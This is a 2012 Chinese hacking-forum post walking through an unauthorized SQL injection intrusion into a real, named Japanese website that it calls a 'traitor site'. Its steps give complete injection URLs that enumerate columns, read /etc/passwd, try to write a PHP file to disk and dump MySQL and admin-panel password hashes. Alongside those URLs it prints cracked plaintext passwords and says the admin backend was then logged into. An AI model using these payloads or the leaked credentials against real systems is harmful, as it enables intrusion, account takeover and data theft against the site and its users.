找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
返回列表 发新帖
查看: 4242|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

, k7 y! [  D9 [4 Z
& S( o# }; o2 ?5 |/ q- }6 I2 y0x01. 检测 www.zuaa.jp 收集数据
2 x! ^) E& Z8 a
/ j* S8 t- A! t& L$ N
* S& d5 A4 O; Q  o* Pwhatweb0 C4 y: R2 ~6 M% Y! j

7 R, y( |1 ]0 F3 X: b
: P) U, V2 b% I- ~0 Z利用NMAP扫描
) m0 L8 ?& |2 e+ ]. m4 t  j+ T1 G5 p
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持3 d" w' W* ?2 j! o& r) |3 W
0x02.找注入点
. N. U5 @0 |6 l$ {- Y$ |# H; W找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390- h2 c5 J1 o+ ]& e1 H% S! ~
" \) V" [: K' C5 G/ T

6 d$ ?! \+ J0 V/ ^6 W1 Q$ I* i2 I0x03.order by
: i( }% E3 h: p8 K             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
+ z5 U' v' Y$ {. I4 b4 ~# r7 j
8 n5 s" i) x/ D% Zorder by 28报错,order by 27正常$ B6 c1 }& c# l

& b7 `" ?1 H) G3 d0x04.   union手动查询
9 V& C. \2 Z$ _2 j: s0 ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
4 ^  [# f( x8 q  d3 b- O# L4 N添加到 27 时正常显示 * D- E* J5 ]! r2 [
( M) f2 x8 W3 ^. m. n" k- p
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
5 E1 P" p4 |) l8 ^& |4 l- ]& w: p3 S: t6 m6 \8 ]
0x05. info:
) }1 L" i) N) v4 m: F) A% N/ Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
" {9 |  t% A! [0 c3 C+ a8 S" y- }7 X% }2 p7 E; B
user:            root@localhost
6 ^- w: q  K6 K- y+ udatabase:    openpne
/ g, j, Z& U% Y8 Y$ k" Gversion:      4.1.226 l+ b$ H3 J8 K8 ^2 k) W1 E% W
os:             portbld-freebsd5.4
7 m, y! x3 |4 l/ G+ z/ n5 X
0 }0 T& `. p/ ?& N, R# a+ y0x06. root用户" k# S1 R4 z+ E  q/ _2 h% w
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)/ c! {/ X& N; X" E) r
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
3 m, `( ]- \4 O7 t3 o0 O- x7 h% R" C/ \# R5 o% i8 s
通过工具转换7 y, \0 ?7 M8 l  Z: R9 X
- m* X* E- T( d5 [8 L; ~& f6 A* j+ l$ g
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持1 L* `3 I, e+ i, S% A. r& y; {

- I" `: x7 }- e& n) `( a0x07. 利用 into outfile
2 E5 }" H3 ]( ~6 W全部都失败
/ z' {# w% I) b( |8 d' D. Dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
  Y( j: k: ~# Z& n# `) D6 r( d3 `  p" A8 E9 o) d
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php $ c- U. l0 n* l7 I- v
9 u0 P3 }9 B( j1 Y& F5 f1 O
页面显示“MDB2 Error:syntax error”" A  F: N2 ]" p7 g
" W6 l) Q. A9 u& p' l
0x08. 利用 mysql 4.1. _/ d7 k4 k: ?5 C7 V7 z
猜常规表名,字段未果 工具 sqlmap& u, G; p; Q  a; \' d8 j8 N4 D. `/ n
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
8 l* ^7 ~4 J0 }2 A! F' ]- \/ u/ a
( p+ D4 t9 k; m8 P+ P
8 k9 Q9 _; X0 w2 z7 T& {: o! q' b2 T. f  S4 K' m3 i9 F
0x09. 查找后台) j# N5 b4 t0 e6 f
利用 现有的各种 后台工具尝试都不行: Y# K; ~- `* f
$ f* W: Y! }6 M. w( L& P
0x10.  MySL外联方法. ]# ^4 Q& X" F: }0 Y$ t: O
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
5 p: V+ R, a5 k- O6 \可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user: l: j2 ?- C, O4 m! d7 N# W
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user- m& T  t8 p! N( ^+ c
: x5 P1 g8 Z0 u+ V2 _2 a
这个可以在 www.cmd5.com 解密0 {6 T' [8 B3 O$ J' O
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20093 t) W. E' J! |& K- B  o1 m
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
6 @: V$ y) \" L: w* p* `! yopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???2 ~7 B# Y+ ~! s; j4 r/ m9 h
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
% |' r6 l, C& Q) x工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知; N2 V5 }& j1 D8 b# m# K) F
9 F" k$ @, @- A/ `2 I2 B
: T$ B3 ~: V4 @
0x11. 网站突破
+ U7 R% d) ^7 [! j6 t- A6 T发现网站的源程序 openpne, google 下载 openpne 源码2 ]; C5 q. b7 |# M( z3 Q
  v! j  y. K; E) `4 [5 ^

' K: O9 x8 Y8 j- v0x12. 默认信息利用' ^! z% M" p8 g9 P$ a
http://sns.zuaa.jp/?m=admin&a=page_login
4 w$ L4 H6 T, _( ~# C: J, q; l$ g' a& v. G+ Q, I
表名 (c_admin_user) ,字段名(username,password)
$ L$ m% u5 C+ R6 y5 ?, u$ Whttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
# _+ n# u, p$ w( W" f) P
! L* B; k' S' z9 u3 y- U; v- b4 O( w解密6 A' a1 `- y& U* G' w
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
5 m! s# t: E4 {1 ^7 P- K+ o8 Zzuaajp:c0923ec5857796a393da99905008c176,          zju1897
0 o) T  q* [3 N  Z7 I7 @: I8 @/ g9 c: X
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持0 G' Y) [- v4 n
, Y( B/ f$ I8 |! r* r! {
0x13. 登录后台# g  V/ z3 S$ a2 `# B
% D5 Q8 U0 T! P
: S$ R8 ~% @. J6 d% G
- w0 S3 ~$ d/ F& A
0x14. 小结! A2 F5 R% i# c, {/ P$ D3 n
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。* q$ C3 R4 t7 o7 M+ y! V3 g1 D7 n
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
3 J: w! s9 H& z6 b* H------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain) G6 [" I8 a& h% J( a/ }7 D
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持; _# v* K, ~2 S
: G" k: u$ `- [0 U6 D
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!( d$ @3 c$ o4 X/ \

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表